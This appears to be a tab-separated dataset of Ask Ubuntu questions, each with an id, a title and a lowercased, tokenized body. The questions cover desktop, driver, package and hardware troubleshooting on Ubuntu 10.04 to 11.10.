80679	line gets overwritten instead of continuing on same line	i have a problem with the bash prompt . when i type a command that exceeds the length of the width of the screen it continues on the same line and overwrites what i have written , and then continues on line 2 afterwards . this is my ps1 : ps1= '' \ $ ( git_prompt ) $ { biwhite } \w $ { color_off } â `` the variables biwhite='\e [ 1 ; 97m' color_off='\e [ 0m' and then the script for git_prompt : git_prompt ( ) { local g= '' $ ( __gitdir ) '' if [ -n `` $ g '' ] ; then local minutes_since_last_commit=`minutes_since_last_commit` if [ `` $ minutes_since_last_commit '' -gt 30 ] ; then local color= $ { bred } elif [ `` $ minutes_since_last_commit '' -gt 10 ] ; then local color= $ { biyellow } else local color= $ { bgreen } fi local since_last_commit= '' $ { color } $ ( minutes_since_last_commit ) m $ { color_off } '' # the __git_ps1 function inserts the current git branch where % s is local git_prompt=`__git_ps1 `` ( % s| $ { since_last_commit } ) '' ` echo $ { git_prompt } fi } appreciate all help ! thanks !
80680	can not update system - error during signature verification	okay , usually i run an apt-get update and upgrade about once a day . now suddenly it 's telling me this : fetched 666 b in 6s ( 105 b/s ) w : gpg error : ttp : //archive.canonical.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : ttp : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : ttp : //gb.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : ttp : //gb.archive.ubuntu.com oneiric-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch ttp : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : failed to fetch ttp : //gb.archive.ubuntu.com/ubuntu/dists/oneiric-backports/release w : some index files failed to download . they have been ignored , or old ones used instead . now , in all my time of using ubuntu i have never seen this , so i am quite confused . any help would be much appreciated . thankyou , ross ( i have taken out the leading ( h ) in http on purpose , due to link posting restrictions. )
80681	what version of compiz will be installed in 10.10 ?	i want to install ubuntu 10.10 because i do n't like unity . if i install compiz fusion via terminal , will it be the 0.8 version , or the latest one , which is 0.9.6 ?
80682	how do i make a backup of my entire system so i can restore it later ?	i really like how my system is right now , but i want to try other versions of ubuntu and i want to know i can go back to this setup at any moment . i want to backup my system and all the files that are necessary for my system to work . i want to backup my system i want to be able to restore it later how do i make this happen ?
80686	$ term set to `` dumb '' causes problems with suspend	i 've just upgraded from 11.04 to 11.10 . so far i love it , everything seems just so much snappier . now i just have one minor issue . when i try to suspend my laptop , it does n't work - instead it fades out the screen , blocks it and then instantly wakes back . i 've checked the logs in /var/log/pm-suspend.log and this fragment seems relevant : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00clear suspend suspend : term environment variable not set . /usr/lib/pm-utils/sleep.d/00clear suspend suspend : returned exit code 1 . sat nov 19 12:23:20 cet 2011 : inhibit found , will not perform suspend sat nov 19 12:23:20 cet 2011 : running hooks for resume the mentioned script at /usr/lib/pm-utils/sleep.d/00clear reads : # ! /bin/bash clear when i open a terminal anywhere by hand , $ term is set to either `` linux '' or `` xterm '' . however somehow when the 00clear command is executed $ term is set to `` dumb '' . two questions : what is the correct value for $ term when running 00clear script ? where can i set it up ? i 've looked for solutions on the web , however i could only find information on how to configure $ term in a regular terminal ( and this one is set properly ) .
80694	gnome shell running applications in unity ?	gnome shell have current running windows mode like in mac and i love it , but i do n't wont use gnome shell , may be have some way to display the current running applications as well and in unity . update : i want this in unity : )
80695	how do i convert a svg to a png using dithering for gradients ?	if i create a gradient between two similar colours in inkscape and export it to a png it looks something like this : if you look closely you can see rings . if i create a gradient in gimp , there 's the option to use dithering to prevent such rings or lines . how do i convert my svg to a png using dithering for gradients ?
80696	gnome 3 fallback switch missing	i just upgraded to ubuntu 11.10 and installed gnome-shell , but the fallback switch in settings is missing . i see many tutorials where it should be located , but it 's not there . is there something i have n't installed that 's causing this fallback switch not to show ?
80701	how to fix broken gvfs package ?	since i have upgraded to oneiric i have some issues with the gvfs package . because of the fact that nautilus is not able to handle ftp-connections anymore , i tried to reinstall gvfs-backends as recommended in some posts . but apt-get is n't able to do so and i get the message : erneute installation von gvfs-backends ist nicht möglich , es kann nicht heruntergeladen werden . means something like : »new installation of gvfs-backends is not possible , ca n't be downloaded« trying to install it with gdebi i get following message : anybody knows how to fix this ?
80703	how to sort files by file extensions through the command line ?	this is my question : how to sort files by file extensions through the command line ?
80704	microphone does n't work	i always loved using ubuntu and enjoyed its open source service ( though it is not as user friendly as windows ) . at first i faced many conflicts which i managed to solve . but now the problem is that my microphone does not give input sound to the system . i have checked many of my settings including alsamixer and pulseaudio ( they all were a bit confusing for me : o ) . anyway my microphone does not have any problem , it is fine ; and even are the jacks . so , as i connect my microphone to my pc it does not work , i tried using sound recorder to check it . it does not work in any jack ( front , rear ) . when i open the sound settings in the input tab everything seems fine . the mute checkbox is unchecked , output and input volume are maximum , the connector dropbox is change into front microphone from analog ( when the mic is connected to the front jack ) . but there is no reading in the input level signal bar . and there is only one option in the `` choose a device for sound output '' box its is 'internal audio analog stereo ' . i am completely unfamiliar with this problem . any help please . please i need your support to continue with , i am just a beginner . is there any issue with the sound card . my sound card is realtalk viavt1708s codec ... motherboard gigabyte
80705	cant reinstall ubuntu-desktop	on my system ( 11.10 ) eog ( image viewer ) was not working . i uninstalled it but along with it ubuntu-desktop was also removed , but after i reinstalled eog , ubuntu-desktop was not getting installed . if i run eog from command line i get this eog glib-gio-critical ** : timeout was reached for eog there is a bug already reported link it was showing : cant connect to 0 % [ connecting to 192.9.200.9 ( 192.9.200.9 ) ] [ connecting to 192.9.200.9 ( 192.9 . nothing is getting updated . also , image viewer is still not working . how do i solve this ?
80708	how do i install bindfs in 11.10 ?	when i try to install the package bindfs in 11.10 it complains that it ca n't find the package fuse . how can i install bindfs ?
80712	middle mouse click emulation on trackpad , how can i set it ?	i 've just updated to ubuntu 11.10 and i 'm using unity . since the update i can no longer use 'middle clicks ' with the track-pad . tab-browsing in firefox has become a pain : ( i used to swap the 'three finger tap ' middle click and the 'two finger tap ' right click , since i nearly never use right clicks . this was done trough the mouse configuration i guess but i ca n't find it now . where can i set this ? to make things even worse the three finger tap does nothing , so middle clicks are not possible at all since the update . how can i fix this ? i know i can remove the install ( i got a separate home partition ) and install an old version but i would like to use the actual software and recent unity if possible .
80714	how do i restart/reload apache when it ca n't determine the domain name ?	after installing xdebug i tried to restart or reload apache and i received the following message : $ sudo /etc/init.d/apache2 reload * reloading web server config apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.0.1 for servername
80715	install ubuntu on pendrive and use remaining disk space to store files , instead of persistence file	is there any way where i can install ubuntu on my pendrive / usb stick , and then have my files , settings , etc . saved across reboots ? i want the files to be easily accessible from other computers , so they should be directly on the pendrive partition , not inside a persistence file . that way , i can use my computer to copy files to /home/ubuntu/desktop and then be able to see them on my desktop when i boot from the pendrive . this is how puppy linux works if you install it on an ext2/3/4 filesystem . if it 's not possible , then can i create another partition on my pendrive an use it for /home/ubuntu in my live system ?
80720	unable to add 100hz output with xrandr	my tv supports 100/120hz output . i tried the following commands to add the mode : find the magic numbers : $ cvt 1920 1080 100 # 1920x1080 99.90 hz ( cvt ) hsync : 114.58 khz ; pclk : 302.50 mhz modeline `` 1920x1080_100.00 '' 302.50 1920 2072 2280 2640 1080 1083 1088 1147 -hsync +vsync add the new mode : $ xrandr -- newmode `` 1920x1080_100 '' 302.50 1920 2072 2280 2640 1080 1083 1088 1147 -hsync +vsync have a look at xrandr to check the mode is created correctly : 1920x1080_100 ( 0xec ) 302.5mhz h : width 1920 start 2072 end 2280 total 2640 skew 0 clock 114.6khz v : height 1080 start 1083 end 1088 total 1147 clock 99.9hz now to the good part , add the mode to my hdmi output : $ xrandr -- addmode dfp2 1920x1080_100 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 157 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 32 current serial number in output stream : 33 i did the same for 120hz , same issue . is there anyone who can help me with this ?
80721	only 3.2 gb of memory being used on a 64-bit system	i have ubuntu 11.10 64 bit : linux 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux i have installed 4 gb of ram : $ sudo dmidecode -- type 17 | grep -e `` size|form factor|memory device|type '' memory device size : 1024 mb form factor : dimm type : ddr2 type detail : synchronous memory device size : 1024 mb form factor : dimm type : ddr2 type detail : synchronous memory device size : 1024 mb form factor : dimm type : ddr2 type detail : synchronous memory device size : 1024 mb form factor : dimm type : ddr2 type detail : synchronous but my pc can see only 3.2 gb of it . $ free total used free shared buffers cached mem : 3347240 1404628 1942612 0 47156 603992 -/+ buffers/cache : 753480 2593760 swap : 2093052 0 2093052 i found this article : https : //help.ubuntu.com/community/enablingpae . it says that pae is enabled by default on 64-bit operating systems , so my system should see my 4gb ram . but it does n't . what could be the problem ? this duplicate question contains even more detail .
80725	ca n't see hidden data , ctrl-h does n't help	i am a newbie in ubuntu . i know by making folder starting with . makes it hidden in linux so i did the same on my kingston flash drive . but i ca n't see it back . i have tried ctrl-h but it did n't work . the data is there as i can see it as occupied space in properties , but i am unable to see it/access it . i really need that data .
80728	broadcom wmp54g firmware missing	i am using a pc , running windows 7 as main os and ubuntu 10.10 as secondary os . i have loaded the ubuntu as an 'app ' through wubi installer . i have booted into ubuntu and found that i am unable to connect to the internet , getting a message that i have 'missing firmware ' for my wireless device . i have been looking up this subject for quite a while . i have looked into the 'additional drivers ' but the driver does not come up there . the only drivers i see are ones for my nvidia graphics card . please help , thankyou .
80733	how do you encrypt and decrypt files using your keychain ?	remember this little guy over here ? he 's no longer with us in ubuntu 11.10 . now , a friend 's sent me an encrypted file using a public key i think i have the key fore in my keychain . how can i decrypt it ?
80735	how to hide status in pidgin ?	i am using qq ( an im ) in pidgin , i have not found how to hide my status : online , offline , away ... could anyone help ?
80739	how to change shortcut in pidgin ?	i use pidgin to chat ... at the moment alt-s launches smiles , does anyone know how to change it to send the message ?
80740	one huge `` share '' folder	is there ( or should there even be ) a large completely public folder that all ubuntu one users could dump files into to let people have access to their ideas ?
80745	wireless disappeared after upgrading on top of a tweaked kernel	i upgraded my old machine , a fujitsu-siemens amilo pi 1505 , to 11.10 using the alternate dvd iso . wireless networking was working before the upgrade . wireless networking worked during the upgrade . wireless networking is no longer working after upgrade . it is not available even before logging in . ( wired connection still works thankfully , but the wire is n't long enough to reach downstairs on top of the tv where the old laptop normally delights us with dvds , vimeo shorts or reruns of big buck bunny : ) on a related note , s-video stopped working when i upgraded to natty . this was caused by a kernel regression , so back then i installed a new kernel using an arcane means that i do n't remember right now . symptoms : when i click on the networking indicator none of the options relating to wireless are present . if i click on `` edit connections ... '' and select the `` wireless '' tab , the old wireless connection is still present . attempted solution 1 : i opened additional drivers to check if i needed a proprietary drivers . it is completely empty . ( is that normal ? ) attempted solution 2 : based on this post i edited /etc/networkmanager/networkmanager.conf and changed [ ifupdown ] managed=false to [ ifupdown ] managed=true . this has made no difference . attempted solution 3 : disabled ipv6 per this suggestion . no difference . what else can i do ? these results generated after attempted solution 2 : results of lspci -nvn | grep -i net : 05:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) subsystem : intel corporation pro/wireless 3945abg network connection [ 8086:1001 ] 06:05.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) results of nm-tool : networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : 8139too state : connected default : yes hw address : -- : -- : -- : -- : -- : -- capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 10.0.0.6 prefix : 24 ( 255.255.255.0 ) gateway : 10.0.0.2 dns : 10.0.0.2 results of iwconfig : lo no wireless extensions . eth0 no wireless extensions . results of iwconfig : lo no wireless extensions . eth0 no wireless extensions . results of rfkill list all : ( nothing ) results of sudo iwlist scan : lo interface does n't support scanning . eth0 interface does n't support scanning . results of lsmod | grep iwl : nothing . contents of /etc/networkmanager/networkmanager.conf : [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=true results of sudo modprobe iwl3945 : fatal : could not load /lib/modules/3.0.1-030001-generic/modules.dep : no such file or directory results of sudo lshw -class network : *-network unclaimed description : network controller product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : f7000000-f7000fff *-network description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : 5 bus info : pci @ 0000:06:05.0 logical name : eth0 version : 10 serial : 00:03:0d:4b:52:20 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=full ip=10.0.0.6 latency=32 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:16 ioport:2000 ( size=256 ) memory : b0300c00-b0300cff results of uname -a : linux ceciliapayne 3.0.1-030001-generic # 201108060905 smp sat aug 6 10:43:25 utc 2011 i686 i686 i386 gnu/linux
80746	how to change the default language ?	i have freshly installed ubuntu 11.10 on my net book , by mistake i choosed wrong language not a english now i want to change my default language back to my loving english i tried to set english via language support tool but still by folder names display in other lanuage rather than english
80749	sound hardware is detected but keyboard buttons , panel icon buttons do n't work	i have 64-but ubuntu 11.10 . the sound works fine , but the keyboard sound keys do n't work . the sound icon on the top panel also does n't work . also no hardware devices & running applications are shown in the sound settings . screenshot 1 : screenshot 2 : results of some commands that might help : $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) subsystem : dell device 02be flags : bus master , fast devsel , latency 0 , irq 46 memory at fc500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel -- 01:00.1 audio device : ati technologies inc rv710/730 subsystem : dell device 02be flags : bus master , fast devsel , latency 0 , irq 47 memory at fc010000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel $ cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xfc500000 irq 46 1 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xfc010000 irq 47 i think some packages are missing . any suggestions ?
80752	ubuntu stability problems	this is my second version of ubuntu , 11.04 worked really well for me , and i was really excited about 11.10 ... until i installed it . i started by using the upgrade button in the upgrade app , but found that the new version was unstable - firefox would crash every few minutes , i would be logged out very suddenly for no known reason , and so i decided to do a clean format and install , believing that this may fix the problem . unfortunately , it seems that the problem is with 11.10 itself , as firefox , chromium , and various other programs crash for no reason , flash crashes and i still get chucked out of ubuntu . is there any way i can make this more stable , or should i just give in and go to 10.04 ? in fact , chromium just crashed while i was typing this up . what can i do ? update hardware : hp pavilion with a snapper mobo , running bios 3.08 , with a 2.66ghz celeron ( 32-bit ) , 2gb sdram with a geforce 5200 gfx card gpu is running the latest driver , according to the additional drivers app . update # 2 memtest returned a pass without errors , so it appears that the ram is clean . update # 3 i thought i had it cracked - for a few days , everything worked fine , now just about every program is subject to random shut downs , the desktop vanishes a lot , the unity start menu thing disappears all the time when i 'm using it and in gnome , the desktop keeps crashing out - much as windows explorer might do if it had some problems . i 've decided to go back to 10.04 as there does n't seem to be a way to get back to 11.04 . failing that , it 's back to m $ - i do n't like it , but at least it works .
80757	why is this in my fstab /dev/mapper/cryptswap1 ?	with my new ubuntu 11.10 , i have , i was not able to hibernate my system . when i checked if i have alloted enough swap space , i found the following lines in my fstab . # swap was on /dev/sda7 during installation # uuid=69d389f9-f78e-4da8-b044-85faf53650ed none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 why is swap modified ? i dont want any encryption for my swap . i want to be able to hibernate my laptop . how do i undo this ?
80759	how do i translate a meta-package ( .deb ) ?	i have created a meta-package called communtu-add-sources-lewisgoddard-liberta-bundle_2_i386.deb on en.commutu.org unfortunately the packages installer language ( it has a popup window when adding sources ) is in german . how do i go about translating it ? download
80761	installing 11.04 to a usb key	is it possible to install ubuntu 11.04 to a 4gb usb key and run the os but when you shut off for it to retain files , settings , etc ?
80763	how can i force fullscreen on my right screen ?	i have 2 screens : 17 '' on left and 22 '' screen on right side . when i watch a movie with vlc and want to watch on full-screen on my 22 '' screen ( the right one ) , i move my vlc window in right screen and then click on full-screen = > no problem . but when using firefox and watching streaming video , watching on full-screen is always on 17 '' screen ( left one ) . how can i force full-screen to be on my 22 '' screen ( right one ) ?
80764	ipod shows more tracks than library after sync with banshee	i am running ubuntu 11.10 , gnome shell 3.2 and banshee 2.2 . banshee correctly recognizes my 80gb ipod classic ( model no mb147llm , version 1.1.2 pc ) . i have set banshee to sync the entire library for the ipod . when i sync , the ipod shows more music tracks than the banshee library . the difference is large - some 5,500 banshee tracks and about 5,900 tracks on the ipod . what is happening ? what is the remedy ?
80765	is it possible to install ubuntu onto a dvd ?	is it possible to install ubuntu 11.10 onto a dvd as a full working version , which treats the dvd as the hard drive ( like you can with a usb ) ?
80766	contact sync not working	i am trying to get contact sync to work with a fresh installation of ubuntu 11.10 . i have activated the service and installed the thunderbird plugin via the ubuntu one control panel . i get the ubuntu one address book but addresses created there are not synced with my ubuntu one account and vice versa . i never got contact sync to work with previous versions of ubuntu and evolution either , despite trying many solutions suggested on the web . ( file sync had not worked before 11.04 but miraculously started to work with 11.04 without me doing anything specific about it . ) thanks for your help ! ralf
80767	is it possible to open applications in a terminal and have them load on a particular workspace ?	is it possible to open applications in a terminal and have them load on particular workspace ? to be clear , what i mean is as follows : let 's say i would like to open up banshee , i run the banshee command from the terminal . that alone would have it load in the terminal 's same workspace . let 's say i run the terminal in workspace 1 ( fyi , i use 4 workspaces ) but i would like banshee to load in workspace 4 . is it possible to do this from the terminal ? regards , ederico .
80771	how do i ensure all of the ports on my machine are open or reachable ?	i was testing port connectivity on my machine because wow ( which uses tcp ports 3724 , 6112 , and 6881-6999 ) could n't connect to the internet . so i downloaded pfportchecker application and ran it using wine ( v1.3 ) . after i tried to check every port , it seems like they 're not reachable/closed . why is that ? my firewall is disabled so why is this happening ? how can i open these ports and how can i see if these ports are opened or not ? also , how can i determine which application is using them ?
80772	what 's the deal with all these chuck montages ?	planet ubuntu is full of hilarious chuck montages . here two examples : why is that ? how did chuck become an ubuntu meme ? note : this question is not meant to be a chuck montage collection . it is a real question !
80774	how do i get todolist ( abstract spoon ) working ?	i wish to run todolist 6.3.8 on ubuntu 11.10 . i have installed the latest wine and winetricks . i have tried running : http : //www.codeproject.com/kb/applications/todolist2.aspx winetricks vcrun2005 winetricks vcrun2008 winetricks vcrun6 which installed all of the components . when i went to run todolist.exe , it started fine with the `` first time wizard '' ( asking me where to save definitions and what file to open first ) , and then it stopped saying '' the program todolist.exe has encountered a serious problem and needs to close . we are sorry for the inconvenience '' . what can i do to make this ( great ) software work on ubuntu ?
80777	how to find keycodes for fn + keys ?	i 'm trying to find out the keycode for fn+← keypress ( left arrow ) . xev outputs focusout event , serial 36 , synthetic no , window 0x3c00001 , mode notifygrab , detail notifyancestor focusin event , serial 36 , synthetic no , window 0x3c00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 36 , synthetic no , window 0x0 , keys : 4294967213 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 if it is telling me the keycode here , i 'm not able to interpret it so help would be appreciated . i 'm also curious for finding out if it 's possible to bind something to fn+del but when trying out this combination , xev outputs keypress event , serial 36 , synthetic no , window 0x3c00001 , root 0xad , subw 0x0 , time 1984903 , ( -666,480 ) , root : ( 53,533 ) , state 0x0 , keycode 119 ( keysym 0xffff , delete ) , same_screen yes , xlookupstring gives 1 bytes : ( 7f ) `` `` xmblookupstring gives 1 bytes : ( 7f ) `` `` xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x3c00001 , root 0xad , subw 0x0 , time 1985008 , ( -666,480 ) , root : ( 53,533 ) , state 0x0 , keycode 119 ( keysym 0xffff , delete ) , same_screen yes , xlookupstring gives 1 bytes : ( 7f ) `` `` xfilterevent returns : false which is exactly the same as pressing del without fn . so , summary for short how can i find keycode for fn+← ( left arrow ) ? is it even possible to bind something to fn+del or am i facing windmills here ?
80779	compiz stop working	i 'm on a laptop sony vaio , vng-nw330f with ubuntu 11.10 . one day i used my computer normally , i shutdown and the other day when i turn on it again , all was different . compiz effects is not working at all , it does n't matter what plugin ( from ccsm ) i enable or disable , nothings happens , nothings changes . i tried next commands : unity -- reset unity -- reset-icons sudo rm -rf .config .gnome .gnome2 .gnome2_private .compiz .icons .fonts .nautilus .themes .qt .local ( from my home directory ) gconftool-2 -- recursive-unset /apps/compiz-1 i try reinstalling compiz ( i remove compiz from software center and installed it again ) . i have just a couple of weeks using ubuntu , i 'm not sure if exist a desktop call it unity 3d , but i think that it 's missing . i want the graphics interface of ubuntu 11.10 by default .
80784	logcheck : ( cron ) error ( grandchild # 4266 failed with exit status 127 )	for my ubuntu 10.04 lts server , logcheck send me this log : nov 14 08:10:01 servername cron [ 4265 ] : ( cron ) error ( grandchild # 4266 failed with exit status 127 ) nov 14 08:10:01 servername cron [ 4264 ] : ( cron ) error ( grandchild # 4267 failed with exit status 127 ) nov 14 08:20:01 servername cron [ 4285 ] : ( cron ) error ( grandchild # 4286 failed with exit status 127 ) nov 14 08:20:01 servername cron [ 4284 ] : ( cron ) error ( grandchild # 4287 failed with exit status 127 ) nov 14 08:30:01 servername cron [ 4294 ] : ( cron ) error ( grandchild # 4295 failed with exit status 127 ) nov 14 08:30:01 servername cron [ 4293 ] : ( cron ) error ( grandchild # 4296 failed with exit status 127 ) nov 14 08:40:01 servername cron [ 4311 ] : ( cron ) error ( grandchild # 4312 failed with exit status 127 ) this is an error of execution to cron [ 127 = command not found ] . if i run the command `` crontab -l '' for each user , i do not see any cron to any user . you have any ideas ? this is my /etc/crontab # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) #
80789	dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem .	murphy @ murphy-compaq-presario-c700-notebook-pc : ~ $ sudo apt-get install clipgrab [ sudo ] password for murphy : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . murphy @ murphy-compaq-presario-c700-notebook-pc : ~ $ sudo dpkg dpkg : error : need an action option type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! murphy @ murphy-compaq-presario-c700-notebook-pc : ~ $ am getting this error when i try to install clipgrab . please help
80793	wacom bamboo cth-670 is not detected	i 've a wacom bamboo create pen tablet ( cth-670 ) which is not detected by the system settings , ubuntu 11.10 uname -r 3.0.0-13-generic-pae bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c512 logitech , inc. lx-700 cordless desktop receiver bus 002 device 002 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 003 device 003 : id 056a:00df wacom co. , ltd bus 002 device 004 : id 03f0:0601 hewlett-packard scanjet 6300c bus 002 device 005 : id 067b:2305 prolific technology , inc. pl2305 parallel port bus 002 device 006 : id 0409:0056 nec corp. lsmod | grep wacom try to autogen driver input-wacom-0.11.1 from git , but fails with configure : warning : kernel version 3.0.0-13-generic-pae not supported anyone has a solution ? continued with sucessful make in 2.6.36 folder and copied wacom.ko to kernel $ sudo insmod /lib/modules/3.0.0-13-generic-pae/kernel/drivers/input/tablet/wacom.ko csschsu @ omega : ~ $ dmesg | tail [ 191.006084 ] usbcore : registered new interface driver wacom [ 191.006091 ] wacom : v1.52-input-wacom-0.1 : usb wacom tablet driver output of lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c512 logitech , inc. lx-700 cordless desktop receiver bus 002 device 002 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 002 device 003 : id 03f0:0601 hewlett-packard scanjet 6300c bus 002 device 004 : id 067b:2305 prolific technology , inc. pl2305 parallel port bus 002 device 005 : id 056a:00df wacom co. , ltd bus 002 device 006 : id 0409:0056 nec corp. looks fine ? but still empty system settings screen ( and wacom.ko is not loaded after reboot , been running depmod -a , and modules.dep is updated ) tried to use wacom on a fresh installed 11.10 on another machine but same problem there . note from syslog when connecting wacom to usb ( indicate loading another module ? ) nov 22 17:43:09 alfa kernel : [ 64305.585914 ] usb 2-1.6 : new full speed usb device number 4 using ehci_hcd nov 22 17:43:09 alfa mtp-probe : checking bus 2 , device 4 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6 '' nov 22 17:43:09 alfa mtp-probe : bus : 2 , device : 4 was not an mtp device $ lsusb bus 002 device 004 : id 056a:00df wacom co. , ltd is mtp the cause of missing detection , and if so what to do about it . wacom board is a bamboo cth-670 and it works ok on windows but i do n't : -\ removed libmtp-common and that clears the message in syslog but wacom table usb device is not detected and the wacom.ko kernel module is not loaded .
80795	12.04 already available through update-manager : it 's a bug ?	alt + f2 update-manager -d this is what i see on my desktop ( ubuntu lts 10.04.3 amd64 desktop ) : it 's italian , that means ubuntu 12.04 is already available and suited for production ?
80796	does apt-get clean harm your system ?	does cleaning /var/cache/apt/archives by apt-get clean affect installed applications ? is it that the .deb packages there are needed for applications to run properly ?
80809	how to avoid manually updating grub	i have dual boot system with ubuntu 11.10 ( installed first ) and fedora 16 . i have actually two problems . how to avoid manually running update-grub after a fedora kernel update ? after running update-grub , the kernel parameters passed by fedora are missing the grub conf file in ubuntu . please let me know if there is a solution . thanks .
80812	is firefox 8 available for ubuntu 11.10 ?	is firefox 8 available for ubuntu 11.10 ? do i have to change the ppa or something to get firefox 8 for ubuntu 11.10 ? i still have firefox 7 even though i updated ( sudo aptitude update ) thanks for answering my silly question .
80821	integrate program into clock panel	hello , it 's been a while since i last used ubuntu and it looks like that ubuntu changed a lot . some fast questions would be is current default ( ubuntu 11.10 ) panel still gnome-panel or is it unity-panel or so ? i know that it is possible to integrate into messaging panel , although my program is not oriented towards messaging ( imo neither is ubuntu one ) , it 's a google task synchronizer . what is the way to add my program to clock panel ? a subquestion ( a little abstract , but do n't know how to address ) would be , how is the calendar applet made and what are the requirements to make such ?
80827	how to test wine via live usb stick ?	i want to test wine with a current ubuntu live image . i managed to install ubuntu-11.10-desktop-i386.iso on a usb stick . the resulting usb stick boots alright . unfortunately , the live image does not include wine . i noticed that the root file system is an overlay one - the overlay is stored in ram . the problem is that the test system does not have that much ram - i.e . modifying /etc/apt/sources.lst and apt-get install wine works on the live system - but a few packages eat all the available ram and the system halts . plus - i also need some space for installing the windows application ( to test it ) . is it possible to use a spare partition on the usb stick for the root-overlay ? then i would have enough space for the wine packages and the windows application - or am i missing something ?
80828	htc android device mounted as usb drive is read-only unless i 'm root	when i connect my htc incredible s to my ubuntu 10.10 system as a usb drive , the device seems to mount ok , but is read-only unless i access it as root . for example , if i run nautilus , i ca n't drag and drop files to the sd-card in the phone , but if i run sudo nautilus i can . i have usb debug support set on the phone ( applications > development > usb debugging ) and i have added a rule for the device in /etc/udev/rules.d/51-android.rules on my ubuntu system . any suggestions as to how i can mount the drive so that i can copy content to the sd card without needing to sudo ? update following advice from waltinator , i added the following line to my /etc/fstab : uuid=3537-3834 /media/usb1 vfat rw , user , noexec , nodev , nosuid , noauto however , the android device is still being auto-mounted on /media/usb1 with uid and gid root . update 2 syslog output : nov 21 23:38:40 rowan-15 usbmount [ 4352 ] : executing command : mount -tvfat -osync , noexec , nodev , noatime , nodiratime /dev/sdd1 /media/usb1 nov 21 23:38:40 rowan-15 usbmount [ 4352 ] : executing command : run-parts /etc/usbmount/mount.d
